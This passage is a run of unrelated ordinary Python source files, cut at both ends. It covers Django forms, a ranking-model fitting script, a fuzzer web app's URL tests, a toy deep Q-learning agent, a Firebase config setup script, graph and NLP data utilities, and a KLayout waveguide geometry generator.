= self.cleaned_data.get('housing_transport_acknowledgement') if data is not True: raise forms.ValidationError('You must attend to your own housing and transportation needs.') return data class RegCompCodeForm(forms.Form): code = forms.CharField(label='If so, please enter your comp code here:', max_length=CompCodeHelper.CODE_LENGTH, required=False) def clean(self): code = self.cleaned_data.get('code') if code: if not CompCode.objects.filter(code=code).exists(): raise ValidationError('That is not a valid comp code!') comp_code = CompCode.objects.get(code=code) 
if comp_code.max_uses <= comp_code.registration_set.count(): raise ValidationError('That code is already expended.') return self.cleaned_data class RegisterDonateForm(forms.ModelForm): class Meta: model = Order fields = ['donation'] widgets = {'donation': forms.HiddenInput()} 0 # Fit standard Plackett-Luce model to triplet sushi data via MM ## Global variables set in utils.py: epsilon, rtol, n_iter ## load data and initialize MM method as in run_methods: init_all_methods_real_data import numpy as np import cvxpy as cp from scipy.sparse import save_npz, load_npz from utils import * dir = 'sushi_dectet_' ### load data rankings_train = np.load('../data/' + dir + 'data/' + 'rankings.npy') X = np.load('../data/' + dir + 'data/' + 'features.npy').astype(float) mat_Pij = load_npz('../data/' + dir + 'data/' + 'mat_Pij.npz') endog = rankings_train[:, 0] exog = rankings_train ### Initialization, start from a feasible point for all parameters (beta_init, b_init, time_beta_b_init), (pi_init, time_pi_init), (u_init, time_u_init), \ (theta_init, time_theta_init), (exp_beta_init, time_exp_beta_init) = \ init_params(X, rankings_train, mat_Pij, method_beta_b_init='QP') ### Log all results log_dict = dict() ### mm parameters log_dict['mm_conv'] = False log_dict['pi_mm'] = np.copy(pi_init) log_dict['diff_pi_mm'] = [np.linalg.norm(log_dict['pi_mm'])] log_dict['obj_mm'] = [objective(log_dict['pi_mm'], rankings_train)] log_dict['iter_mm'] = 0 ## Run MM method and save logged results from only_scores import * import pickle n = X.shape[0] # number of items for iter in range(n_iter): # mm update if not log_dict['mm_conv']: log_dict['pi_mm_prev'] = log_dict['pi_mm'] log_dict['pi_mm'], time_mm_iter = mm_iter(n, rankings_train, weights=log_dict['pi_mm']) if np.any(np.isnan(log_dict['pi_mm'])): log_dict['mm_conv'] = True else: log_dict['diff_pi_mm'].append(np.linalg.norm(log_dict['pi_mm_prev'] - log_dict['pi_mm'])) log_dict['obj_mm'].append(objective(log_dict['pi_mm'], rankings_train)) log_dict['iter_mm'] += 1 log_dict['mm_conv'] = np.linalg.norm(log_dict['pi_mm_prev'] - log_dict['pi_mm']) < rtol * np.linalg.norm(log_dict['pi_mm']) # stop if converged if log_dict['mm_conv']: break # Save results as a csv file save_name = 'mm' with open('../results/' + dir + 'data/' + '_logs_' + save_name + '.pickle', "wb") as pickle_out: pickle.dump(log_dict, pickle_out) pickle_out.close() # read data import pandas as pd object = pd.read_pickle(r'../results/' + dir + 'data/' + '_logs_' + save_name + '.pickle') object["mm_conv"] np.round_(object["pi_mm"], 3) """ .. code-author: <>, AGH University of Science and Technology """ import aenum from overwatch.base import config from overwatch.database.mongoDatabaseFactory import MongoDatabaseFactory from overwatch.database.zodbDatabaseFactory import ZodbDatabaseFactory (databaseParameters, _) = config.readConfig(config.configurationType.database) class databaseTypes(aenum.OrderedEnum): mongodb = 0 zodb = 1 def getDatabaseFactory(): """ Creates database factory object using parameters specified in config.yaml. Args: None Returns: Database factory object. 
""" databaseType = databaseParameters["databaseType"] if databaseTypes[databaseType] == databaseTypes.mongodb: return MongoDatabaseFactory( databaseName=databaseParameters["databaseName"], host=databaseParameters["mongoHost"], port=databaseParameters["mongoPort"]) if databaseTypes[databaseType] == databaseTypes.zodb: return ZodbDatabaseFactory( databaseLocation=databaseParameters["databaseLocation"]) sears-s/fluffi # Copyright 2017-2020 Siemens AG # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including without # limitation the rights to use, copy, modify, merge, publish, distribute, # sublicense, and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # # Author(s): , import unittest from app import app, models class TestURLs(unittest.TestCase): def setUp(self): self.client = app.test_client() fuzzjob = models.Fuzzjob.query.first() if fuzzjob and hasattr(fuzzjob, "ID"): self.projId = fuzzjob.ID else: print("Error: No fuzzjob exists for testing!") def test_root_redirect(self): """ Tests if the root URL gives a 200 """ result = self.client.get("/") self.assertEqual(result.status_code, 200) def test_projects_redirect(self): """ Tests if the projects URL gives a 200 """ result = self.client.get("/projects") self.assertEqual(result.status_code, 200) def test_locations_redirect(self): """ Tests if the locations URL gives a 200 """ result = self.client.get("/locations") self.assertEqual(result.status_code, 200) def test_commands_redirect(self): """ Tests if the commands URL gives a 200 """ result = self.client.get("/commands") self.assertEqual(result.status_code, 200) def test_hangs_redirect(self): """ Tests if the hangs URL gives a 200 """ result = self.client.get("/projects/{}/hangs/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_population_redirect(self): """ Tests if the population URL gives a 200 """ result = self.client.get("/projects/{}/population/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_violations_redirect(self): """ Tests if the violations URL gives a 200 """ result = self.client.get("/projects/{}/violations".format(self.projId)) self.assertEqual(result.status_code, 200) def test_view_projects_redirect(self): """ Tests if the view projects URL gives a 200 """ result = self.client.get("/projects/view/{}".format(self.projId)) self.assertEqual(result.status_code, 200) def test_accessVioTotal_redirect(self): """ Tests if the accessVioTotal view URL gives a 200 """ result = self.client.get("/projects/{}/accessVioTotal/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_accessVioUnique_redirect(self): """ Tests if the accessVioUnique view URL gives a 200 """ result = 
self.client.get("/projects/{}/accessVioUnique/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_totalCrashes_redirect(self): """ Tests if the totalCrashes view URL gives a 200 """ result = self.client.get("/projects/{}/totalCrashes/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_noResponse_redirect(self): """ Tests if the noResponse view URL gives a 200 """ result = self.client.get("/projects/{}/noResponse/1".format(self.projId)) self.assertEqual(result.status_code, 200) if __name__ == '__main__': unittest.main() # AI for the Self Driving Car import numpy as np import random import os import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.autograd as autograd from torch.autograd import Variable # Implements Neural Network specifications class Network(nn.Module): def __init__(self, input_size, number_of_actions): super(Network, self).__init__() self.input_size = input_size self.number_of_actions = number_of_actions # Two connections needed when using only 1 hidden layer (input to hidden and hidden to output) # Each layer is fully connected to eachother due to nn.Linear # The hidden layer has 30 neurons self.full_connection1 = nn.Linear(input_size, 30) self.full_connection2 = nn.Linear(30, number_of_actions) # Does forward propagation def forward(self, state): # Applies the rectifier activation function on the hidden layer neurons hidden_neurons = F.relu(self.full_connection1(state)) # Obtains Q values from hidden layer neurons q_values = self.full_connection2(hidden_neurons) return q_values # Implements Experience Replay class ExperienceReplay(object): def __init__(self, capacity): self.capacity = capacity self.memory = [] # Pushes a new event to the memory and makes sure the memory is not overcapacity def push(self, event): self.memory.append(event) if len(self.memory) > self.capacity: del self.memory[0] # Samples events from the memory def sample(self, batch_size): samples = zip(*random.sample(self.memory, batch_size)) return map(lambda x: Variable(torch.cat(x, 0)), samples) # Implements Deep Q Learning class DeepQNetwork(): def __init__(self, input_size, number_of_actions, gamma): # Sets the discount factor self.gamma = gamma # Displays average reward of last 100 events self.reward_average = [] # Creates the Neural Network self.model = Network(input_size, number_of_actions) # Creates Experience Replay with capacity of 100,000 self.memory = ExperienceReplay(100000) # Chooses which optimization algorithm to use to reduce the Loss/Cost function, and the Learning Rate self.optimizer = optim.Adam(self.model.parameters(), lr=0.001) # Creates input Tensor with a fake first dimension self.last_state = torch.Tensor(input_size).unsqueeze(0) self.last_action = 0 self.last_reward = 0 # Decides what the next action should be def select_action(self, state): probs = F.softmax(self.model(Variable(state, volatile=True)) * 100) action = probs.multinomial() return action.data[0,0] def learn(self, batch_state, batch_next_state, batch_reward, batch_action): outputs = self.model(batch_state).gather(1, batch_action.unsqueeze(1)).squeeze(1) next_outputs = self.model(batch_next_state).detach().max(1)[0] target = self.gamma * next_outputs + batch_reward td_loss = F.smooth_l1_loss(outputs, target) self.optimizer.zero_grad() td_loss.backward(retain_variables=True) self.optimizer.step() def update(self, reward, new_signal): new_state = torch.Tensor(new_signal).float().unsqueeze(0) 
self.memory.push((self.last_state, new_state, torch.LongTensor([int(self.last_action)]), torch.Tensor([self.last_reward]))) action = self.select_action(new_state) if len(self.memory.memory) > 100: batch_state, batch_next_state, batch_action, batch_reward = self.memory.sample(100) self.learn(batch_state, batch_next_state, batch_reward, batch_action) self.last_action = action self.last_state = new_state self.last_reward = reward self.reward_average.append(reward) if len(self.reward_average) > 1000: del self.reward_average[0] return action def score(self): return sum(self.reward_average) / (len(self.reward_average) + 1.) def save(self): torch.save({'state_dict': self.model.state_dict(), 'optimizer': self.optimizer.state_dict()}, 'saved_ai.pth') def load(self): if os.path.isfile('saved_ai.pth'): print("Loading checkpoint...") checkpoint = torch.load('saved_ai.pth') self.model.load_state_dict(checkpoint['state_dict']) self.optimizer.load_state_dict(checkpoint['optimizer']) print("Done!") else: print("No checkpoint found...") #!/usr/bin/env python3 import fileinput import os RW_PROJECT_ID = os.environ['RW_PROJECT_ID'] RW_API_KEY = os.environ['RW_API_KEY'] RW_AUTH_DOMAIN = os.environ['RW_AUTH_DOMAIN'] RW_DATABASE_URL = os.environ['RW_DATABASE_URL'] RW_STORAGE_BUCKET = os.environ['RW_STORAGE_BUCKET'] RW_MESSAGING_SENDER_ID = os.environ['RW_MESSAGING_SENDER_ID'] RW_APP_ID = os.environ['RW_APP_ID'] RW_MEASUREMENT_ID = os.environ['RW_MEASUREMENT_ID'] def firebaseFile(): print("firebase file is starting") fileName = ".firebaserc" # read file into memory with open(fileName, 'r') as file : filedata = file.read() # replace variables in place filedata = filedata.replace("RW_PROJECT_ID", RW_PROJECT_ID) # write out updated file with open(fileName, 'w') as file: file.write(filedata) print("firebase file is finished") def localEnvironment(): print("local environment file is starting") fileName = "src/environments/environment.ts" # read file into memory with open(fileName, 'r') as file : filedata = file.read() # replace variables in place filedata = filedata.replace("RW_PROJECT_ID", RW_PROJECT_ID) filedata = filedata.replace("RW_API_KEY", RW_API_KEY) filedata = filedata.replace("RW_AUTH_DOMAIN", RW_AUTH_DOMAIN) filedata = filedata.replace("RW_DATABASE_URL", RW_DATABASE_URL) filedata = filedata.replace("RW_STORAGE_BUCKET", RW_STORAGE_BUCKET) filedata = filedata.replace("RW_MESSAGING_SENDER_ID", RW_MESSAGING_SENDER_ID) filedata = filedata.replace("RW_APP_ID", RW_APP_ID) filedata = filedata.replace("RW_MEASUREMENT_ID", RW_MEASUREMENT_ID) # write out updated file with open(fileName, 'w') as file: file.write(filedata) print("local environment file is finished") def productionEnvironment(): print("production environment file is starting") fileName = "src/environments/environment.prod.ts" # read file into memory with open(fileName, 'r') as file : filedata = file.read() # replace variables in place filedata = filedata.replace("RW_PROJECT_ID", RW_PROJECT_ID) filedata = filedata.replace("RW_API_KEY", RW_API_KEY) filedata = filedata.replace("RW_AUTH_DOMAIN", RW_AUTH_DOMAIN) filedata = filedata.replace("RW_DATABASE_URL", RW_DATABASE_URL) filedata = filedata.replace("RW_STORAGE_BUCKET", RW_STORAGE_BUCKET) filedata = filedata.replace("RW_MESSAGING_SENDER_ID", RW_MESSAGING_SENDER_ID) filedata = filedata.replace("RW_APP_ID", RW_APP_ID) filedata = filedata.replace("RW_MEASUREMENT_ID", RW_MEASUREMENT_ID) # write out updated file with open(fileName, 'w') as file: file.write(filedata) print("production environment file is 
finished") print("setup environment has started") firebaseFile() localEnvironment() productionEnvironment() print("setup environment has finished")# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import os import json import numpy as np import zipfile import networkx from networkx.readwrite import json_graph from galileo.platform.data_source.data_source import DataSource from galileo.platform.data_source.utils import download_url from galileo.platform.log import log if networkx.__version__ != '2.3': raise RuntimeError('please use networkx version 2.3') class PPI(DataSource): url = 'http://snap.stanford.edu/graphsage' def __init__(self, root_dir, name, **kwargs): self.name = name.lower() super().__init__(root_dir, name, **kwargs) @property def raw_dir(self): return os.path.join(self.root_dir, self.name, 'raw') @property def raw_file_names(self): return ['ppi.zip'] def download(self): for name in self.raw_file_names: download_url('{}/{}'.format(self.url, name), self.raw_dir) for name in self.raw_file_names: with zipfile.ZipFile(os.path.join(self.raw_dir, name)) as ppi_zip: ppi_zip.extractall(self.raw_dir) log.info('download ppi done') def read_data(self, prefix, normalize=True): G = json_graph.node_link_graph(json.load(open(prefix + "-G.json"))) if os.path.exists(prefix + "-feats.npy"): feats = np.load(prefix + "-feats.npy") else: print("No features present.. 
Only identity features will be used.") feats = None id_map = json.load(open(prefix + "-id_map.json")) change_key = lambda n: int(n) id_map = {change_key(k): int(v) for k, v in id_map.items()} class_map = json.load(open(prefix + "-class_map.json")) if isinstance(list(class_map.values())[0], list): change_lab = lambda n: n else: change_lab = lambda n: int(n) class_map = { change_key(k): change_lab(v) for k, v in class_map.items() } for node in G.nodes(): if not 'val' in G.node[node] or not 'test' in G.node[node]: G.remove_node(node) else: if G.node[node]['val']: G.node[node]['node_type'] = 0 elif G.node[node]['test']: G.node[node]['node_type'] = 1 else: G.node[node]['node_type'] = 2 for edge in G.edges(): if (G.node[edge[0]]['val'] or G.node[edge[1]]['val'] or G.node[edge[0]]['test'] or G.node[edge[1]]['test']): G[edge[0]][edge[1]]['edge_type'] = 0 else: G[edge[0]][edge[1]]['edge_type'] = 1 if normalize and not feats is None: from sklearn.preprocessing import StandardScaler train_ids = np.array([ id_map[n] for n in G.nodes() if not G.node[n]['val'] and not G.node[n]['test'] ]) train_feats = feats[train_ids] scaler = StandardScaler() scaler.fit(train_feats) feats = scaler.transform(feats) self.evaluate_vertex_ids = tuple(range(44906, 51420)) self.test_vertex_ids = tuple(range(51420, 56944)) return G, feats, id_map, class_map def convert_to_schema(self): schema = { 'vertexes': [{ "vtype": 0, "entity": "DT_INT64", "weight": "DT_FLOAT", "attrs": [{ "name": "feature1", "dtype": "DT_ARRAY_INT32" }, { "name": "feature2", "dtype": "DT_ARRAY_FLOAT" }] }, { "vtype": 1, "entity": "DT_INT64", "weight": "DT_FLOAT", "attrs": [{ "name": "feature1", "dtype": "DT_ARRAY_INT32" }, { "name": "feature2", "dtype": "DT_ARRAY_FLOAT" }] }, { "vtype": 2, "entity": "DT_INT64", "weight": "DT_FLOAT", "attrs": [{ "name": "feature1", "dtype": "DT_ARRAY_INT32" }, { "name": "feature2", "dtype": "DT_ARRAY_FLOAT" }] }], "edges": [{ "etype": 0, "entity_1": "DT_INT64", "entity_2": "DT_INT64", "weight": "DT_FLOAT", "attrs": [] }, { "etype": 1, "entity_1": "DT_INT64", "entity_2": "DT_INT64", "weight": "DT_FLOAT", "attrs": [] }] } with open(self.schema_path, 'w') as f: json.dump(schema, f) log.info(f'write {self.name} schema done') def convert_to_txt(self): prefix = os.path.join(self.raw_dir, "ppi/ppi") G, feats, id_map, class_map = self.read_data(prefix) out_vertex = open(self.vertex_txt_path, 'w') out_edge = open(self.edge_txt_path, 'w') for node in G.nodes(): node_type = G.node[node]['node_type'] node_id = node node_weight = 1 feature1 = class_map[node] feature1 = ','.join(str(x) for x in feature1) feature2 = list(feats[node]) feature2 = ','.join(str(x) for x in feature2) out_vertex.write( f"{node_type}\t{node_id}\t{node_weight}\t{feature1}\t{feature2}\n" ) for tar in G[node]: edge_type = G[node][tar]['edge_type'] src_id = node dst_id = tar edge_weight = 1 out_edge.write( f"{edge_type}\t{src_id}\t{dst_id}\t{edge_weight}\n") out_vertex.close() out_edge.close() log.info(f'convert {self.name} to graph txt files done') 0 from forte.data.base_pack import PackType from forte.processors.base.writers import JsonPackWriter class DocIdJsonPackWriter(JsonPackWriter[PackType]): # pylint: disable=no-self-use def sub_output_path(self, pack: PackType) -> str: if pack.meta.doc_id is None: raise ValueError( "Cannot use DocIdJsonPackWriter when doc id is not set.") return pack.meta.doc_id + '.json' 10-100 from service.Activation import Activation class NetworkLearning: def applyForwardPropagation(dump, nodes, weights, instance, 
activation_function): #transfer bias unit values as +1 for j in range(len(nodes)): if nodes[j].get_is_bias_unit() == True: nodes[j].set_net_value(1) #------------------------------ #tranfer instace features to input layer. activation function would not be applied for input layer. for j in range(len(instance) - 1): #final item is output of an instance, that's why len(instance) - 1 used to iterate on features var = instance[j] for k in range(len(nodes)): if j+1 == nodes[k].get_index(): nodes[k].set_net_value(var) break #------------------------------ for j in range(len(nodes)): if nodes[j].get_level() > 0 and nodes[j].get_is_bias_unit() == False: net_input = 0 net_output = 0 target_index = nodes[j].get_index() for k in range(len(weights)): if target_index == weights[k].get_to_index(): wi = weights[k].get_value() source_index = weights[k].get_from_index() for m in range(len(nodes)): if source_index == nodes[m].get_index(): xi = nodes[m].get_net_value() net_input = net_input + (xi * wi) #print(xi," * ", wi," + ", end='') break #iterate on weights end net_output = Activation.activate(activation_function, net_input) nodes[j].set_net_input_value(net_input) nodes[j].set_net_value(net_output) #------------------------------ return nodes def applyBackpropagation(dump, instances, nodes, weights, activation_function, learning_rate, momentum): num_of_features = len(instances[0]) - 1 for i in range(len(instances)): #apply forward propagation first nodes = NetworkLearning.applyForwardPropagation(dump, nodes, weights, instances[i], activation_function) actual_value = instances[i][len(instances[0])-1] predicted_value = nodes[len(nodes) - 1].get_net_value() #print("actual: ",actual_value," - predicted:",predicted_value) small_delta = actual_value - predicted_value nodes[len(nodes) - 1].set_small_delta(small_delta) for j in range(len(nodes)-2, num_of_features, -1): #output delta is already calculated on the step above, that's why len(nodes)-2 #look for connections including from nodes[j] target_index = nodes[j].get_index() sum_small_delta = 0 for k in range(len(weights)): if weights[k].get_from_index() == target_index: affecting_theta = weights[k].get_value() affetcting_small_delta = 1 target_small_delta_index = weights[k].get_to_index() for m in range(len(nodes)): if nodes[m].get_index() == target_small_delta_index: affetcting_small_delta = nodes[m].get_small_delta() break #------------------------- newly_small_delta = affecting_theta * affetcting_small_delta sum_small_delta = sum_small_delta + newly_small_delta #--------------------------- nodes[j].set_small_delta(sum_small_delta) #calculation of small deltas end #------------------------------- #apply stockastic gradient descent to update weights previous_derivative = 0 #applying momentum requires to store previous derivative for j in range(len(weights)): weight_from_node_value = 0 weight_to_node_delta = 0 weight_to_node_value = 0 weight_to_node_net_input = 0 for k in range(len(nodes)): if nodes[k].get_index() == weights[j].get_from_index(): weight_from_node_value = nodes[k].get_net_value() if nodes[k].get_index() == weights[j].get_to_index(): weight_to_node_delta = nodes[k].get_small_delta() weight_to_node_value = nodes[k].get_net_value() weight_to_node_net_input = nodes[k].get_net_input_value() #--------------------------- derivative = weight_to_node_delta * Activation.derivative(activation_function, weight_to_node_value, weight_to_node_net_input) * weight_from_node_value weights[j].set_value(weights[j].get_value() + learning_rate * derivative + 
momentum * previous_derivative) return nodes, weights def calculate_cost(dump, instances, nodes, weights, activation_function): J = 0 for i in range(len(instances)): instance = instances[i] nodes = NetworkLearning.applyForwardPropagation(dump, nodes, weights, instance, activation_function) predict = nodes[len(nodes)-1].get_net_value() actual = instances[i][len(instances[i])-1] #print("((",predict,"-",actual,")^2)/2 = ", end='') cost = (predict-actual)*(predict-actual) cost = cost / 2 #print(cost) J = J + cost J = J / len(instances) return J import numpy as np import pandas as pd import pandas.util.testing as tm from dask.dataframe.utils import ( _check_dask, _maybe_sort, assert_divisions, assert_sane_keynames, ) def assert_dd_eq( a, b, check_names=True, check_dtypes=True, check_divisions=True, check_index=True, **kwargs, ): if check_divisions: assert_divisions(a) assert_divisions(b) if hasattr(a, "divisions") and hasattr(b, "divisions"): at = type(np.asarray(a.divisions).tolist()[0]) # numpy to python bt = type(np.asarray(b.divisions).tolist()[0]) # scalar conversion assert at == bt, (at, bt) assert_sane_keynames(a) assert_sane_keynames(b) a = _check_dask(a, check_names=check_names, check_dtypes=check_dtypes) b = _check_dask(b, check_names=check_names, check_dtypes=check_dtypes) if not check_index: a = a.reset_index(drop=True) b = b.reset_index(drop=True) if hasattr(a, "to_pandas"): try: a = a.to_pandas(nullable_pd_dtype=False) except TypeError: a = a.to_pandas() if hasattr(b, "to_pandas"): try: b = b.to_pandas(nullable_pd_dtype=False) except TypeError: b = b.to_pandas() if isinstance(a, pd.DataFrame): a = _maybe_sort(a) b = _maybe_sort(b) tm.assert_frame_equal(a, b, **kwargs) elif isinstance(a, pd.Series): a = _maybe_sort(a) b = _maybe_sort(b) tm.assert_series_equal(a, b, check_names=check_names, **kwargs) elif isinstance(a, pd.Index): tm.assert_index_equal(a, b, **kwargs) else: if a == b: return True else: if np.isnan(a): assert np.isnan(b) else: assert np.allclose(a, b) return True Contest/checkPronic.py import math def checkPronic (x) : i = 0 while ( i <= (int)(math.sqrt(x)) ) : if ( x == i * (i + 1)) : return True i = i + 1 return False string = input() res = [string[i: j] for i in range(len(string)) for j in range(i + 1, len(string) + 1)] returner = [] for i in res: if checkPronic(int(i)): returner.append(int(i)) returner.sort() store = set() if len(returner) == 0: print("-1") exit() for i in range(len(returner)-1): if returner[i] not in store and returner[i]!=0: store.add(returner[i]) print(returner[i], end=",") print(returner[len(returner)-1]) #!/usr/bin/python """ vfs.mdstat.failed_devs scripts item This file is part of ZTC and distributed under GNU GPL v.3 Copyright (c) 2010 <> """ from ztc.system.vfs import MDStatus md = MDStatus() md.get('failed_devs') from common.lumerical_lumapi import lumapi from klayout import db from common.common_methods import get_klayout_app_path try: from lumgen.lumgeo import generate_lum_geometry, generate_gds_from_pcell except: from lumgeo import generate_lum_geometry, generate_gds_from_pcell import yaml import os class WaveguideStripGeometry(): def __init__(self, design_file, process_file, lum_app = None): self.lum_app = lum_app self.process_file = process_file self.design_file = design_file self.klayout_app_path = None self.create_gds_klayout_script = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))),"lumgen","create_gds_klayout.py") self.layer = {} self.dbu = 0.001 self.length = 3.0 
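# Unit note: self.dbu = 0.001 um above means one KLayout database unit equals
# 1 nm, so micron dimensions are later converted with value_um / self.dbu in
# generate_gds_from_width (for example, a 0.5 um wide waveguide becomes
# 0.5 / 0.001 = 500 database units, hence a "..._w=500nm" GDS file name).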
self.bend_to_straight_margin = 10.0 # Distance from edge of bent waveguide to edge of straight waveguide self.get_geometry_params() self.create_geometry_dirs() def get_geometry_params(self): ''' Get geometry params and GDS layer info (layer number and datatype) GDS layers are defined by a layer number and datatype (i.e. 1/0, 1 is the layer number and 0 is the datatype) Returns ------- None. ''' try: with open(self.design_file) as f: data = yaml.load(f, Loader=yaml.FullLoader) except FileNotFoundError: print("YAML file does not exist... Cannot obtain layer info... Passing...") return except yaml.YAMLError: print("Error in YAML file... Cannot obtain layer info... Passing...") return except TypeError: if type(self.design_file) == tuple: self.design_file = self.design_file[0] with open(self.design_file) as f: data = yaml.load(f, Loader=yaml.FullLoader) # Save tech,lib, pcell names self.techname = data.get('techname','EBeam') self.libname = data.get('libname','EBeam') self.pcellname = data.get('pcellname', 'Waveguide') # Save base geometry params self.width = data['design-params']['width'] self.radius = data['design-params']['radius'] self.bezier = data['design-params']['bezier'] # Save layer source info (i.e. 1:0) for name, info in data['layers'].items(): self.layer[name] = info.split(' - ')[-1] def generate_gds_from_width(self, width): ''' Generate GDS of waveguide GDS is stored in same directory as python file. Parameters ---------- width : float Waveguide width (um) length : float Waveguide length (um) Returns ------- file_dir : str Absolute path of GDS file ''' # TODO: Get technology params # TODO: Use SiEPIC to get tech params (dbu) self.dbu = 0.001 # Create layout object with top cell ly = db.Layout() top = ly.create_cell("TOP") # Define layer(s) ly_number = int(self.layer['Waveguide'].split(':')[0]) ly_datatype = int(self.layer['Waveguide'].split(':')[1]) wg_layer = ly.layer(ly_number, ly_datatype) # Generate geometric shapes wg_geometry = db.Box(0, -self.length/self.dbu/2, width/self.dbu, self.length/self.dbu) # Insert shape(s) into layout under parent cell top.shapes(wg_layer).insert(wg_geometry) # Write to GDS file_dir = os.path.join(self.gds_dir,"Waveguide_w="+str(int(width/self.dbu))+"nm.gds") ly.write(file_dir) print("Created %s" % file_dir) return file_dir def generate_gds_from_params(self, width, radius, bezier): if self.klayout_app_path == None: self.klayout_app_path = get_klayout_app_path() length = radius + self.bend_to_straight_margin gds_path = os.path.join(self.gds_dir,"Waveguide_w={}nm_r={}nm_b={}.gds".format(int(width*1000), int(radius*1000), bezier)) generate_gds_from_pcell(gds_path, self.techname, self.libname, self.pcellname, params = {"path": [[0,0],[length,0], [length,length]], "radius": radius, "widths": [width], "bezier": bezier, "adiab": 1}) return gds_path def sweep_width(self, width_range, resolution): ''' Generate GDS sweep of widths given a resolution Sweep width given the resolution and get as close as possible to the end width range. 
Parameters ---------- width_range : list List of size 2 where the first number indicates the start of the width sweep (um) and the second indicates the end of sweeping widths (um) resolution : float Amount incremented to get to next width (um) Returns ------- self.width_sweep_mapping: dict Keys = GDS file paths (type: str), Vals = Waveguide widths in um (type: float) ''' print("Create waveguide GDS sweeping widths") self.width_sweep_mapping = {} width = width_range[0] while width <= width_range[1]: self.width_sweep_mapping[self.generate_gds_from_width(width)] = width width = width + resolution return self.width_sweep_mapping def sweep_radius(self, width, radius_range, resolution): ''' Generate GDS sweep of radii given a resolution Sweep radii give the resolution and get as close as possible to the end radius range. Command line commands that work: #C:\\klayout-0.26.6-win64\\klayout_app.exe -b -r C:\\Users\\seanl\\KLayout\\pymacros\\test_python_cmd_line.py -rd bob="hello world" #C:\\klayout-0.26.6-win64\\klayout_app.exe -r "C:\\Users\\seanl\\Documents\\01_UBC\\Academics\\Grad School\\01_Work\\PDK-Generator\\Repo\\PDK-Generator\\python\\lumgen\\create_gds_klayout.py" -rd techname="EBeam" -rd libname="EBeam" -rd pcellname="Waveguide" -rd out_dir="C:\\Users\\seanl\\Downloads\\test7.gds" -rd params="{\\"radius\\": 2}" Parameters ---------- width : float Waveguide width (um) radius_range : list of floats (Size of 2) First entry is the minimum radius, second entry is the max radius. (um) resolution : float Increment size between each radii value. (um) Returns ------- self.radius_sweep_mapping : dict Keys = GDS file location, Vals = Radius (um) ''' print("Create waveguide GDS sweeping radii") print("Running KLayout in command line...") print("NOTE: If you copy and paste the following commands into cmd line, ensure quotations are around file paths so that spaces are captured\n") if self.klayout_app_path == None: self.klayout_app_path = get_klayout_app_path() self.radius_sweep_mapping = {} r = radius_range[0] while r <= radius_range[1]: gds_path = os.path.join(self.gds_dir,"Waveguide_r={}nm.gds".format(int(r*1000))) self.radius_sweep_mapping[gds_path] = r length = r + self.bend_to_straight_margin generate_gds_from_pcell(gds_path, self.techname, self.libname, self.pcellname, params = {"path": [[0,0],[length,0], [length,length]], "radius": r, "widths": [width],"adiab": 0}) r = r + resolution return self.radius_sweep_mapping def sweep_bezier(self, width, radius, bezier_range, resolution): ''' Generate GDS sweep of radii given a resolution Sweep radii give the resolution and get as close as possible to the end radius range. Command line commands that work: #C:\\klayout-0.26.6-win64\\klayout_app.exe -b -r C:\\Users\\seanl\\KLayout\\pymacros\\test_python_cmd_line.py -rd bob="hello world" #C:\\klayout-0.26.6-win64\\klayout_app.exe -r "C:\\Users\\seanl\\Documents\\01_UBC\\Academics\\Grad School\\01_Work\\PDK-Generator\\Repo\\PDK-Generator\\python\\lumgen\\create_gds_klayout.py" -rd techname="EBeam" -rd libname="EBeam" -rd pcellname="Waveguide" -rd out_dir="C:\\Users\\seanl\\Downloads\\test7.gds" -rd params="{\\"radius\\": 2}" Parameters ---------- width : float Waveguide width (um) radius : float Waveguide bend radius (um) bezier_range : list of floats (Size of 2) First entry is the minimum bezier param, second entry is the max bezier param. resolution : float Increment size between each bezier value. 
Returns ------- self.bezier_sweep_mapping : dict Keys = GDS file location, Vals = bezier param ''' print("Create waveguide GDS sweeping bezier param") print("Running KLayout in command line...") print("NOTE: If you copy and paste the following commands into cmd line, ensure quotations are around file paths so that spaces are captured\n") if self.klayout_app_path == None: self.klayout_app_path = get_klayout_app_path() self.bezier_sweep_mapping = {} length = radius + self.bend_to_straight_margin b = bezier_range[0] while b <= bezier_range[1]: gds_path = os.path.join(self.gds_dir,"Waveguide_b={}_r={}nm.gds".format(b, int(radius*1000))) self.bezier_sweep_mapping[gds_path] = b generate_gds_from_pcell(gds_path, self.techname, self.libname, self.pcellname, params = {"path": [[0,0],[length,0], [length,length]], "radius": radius, "widths": [width], "bezier": b, "adiab": 1}) b = b + resolution return self.bezier_sweep_mapping def sweep_bezier_and_radius(self, width, radius_list, bezier_range, resolution): self.bezier_radius_sweep_mapping = {} for radius in radius_list: self.bezier_radius_sweep_mapping[radius] = self.sweep_bezier(width, radius, bezier_range, resolution) return self.bezier_radius_sweep_mapping def create_geometry_dirs(self): # define paths self.gds_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),"gds") # create dirs if not available if not 